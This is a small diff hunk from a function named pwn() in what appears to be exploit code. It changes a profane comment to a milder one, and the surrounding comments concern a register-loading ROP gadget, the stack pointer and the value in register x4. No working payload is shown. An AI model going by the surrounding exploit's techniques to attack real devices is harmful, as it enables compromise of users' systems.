@@ -860,7 +860,7 @@ function pwn() {
         // in regloader
         // NOTE: REGLOADER DOES NOT ADJUST SP!
         // sometimes i didn't get expected value in x4
-        // and i have no fucking idea why
+        // and i have no earthly idea why
         // usleep likely did the trick, but I would still keep the code
         // with movx4
         //arr[pos++] = x4.lo()                    // x4 (should be -- but see lines above)
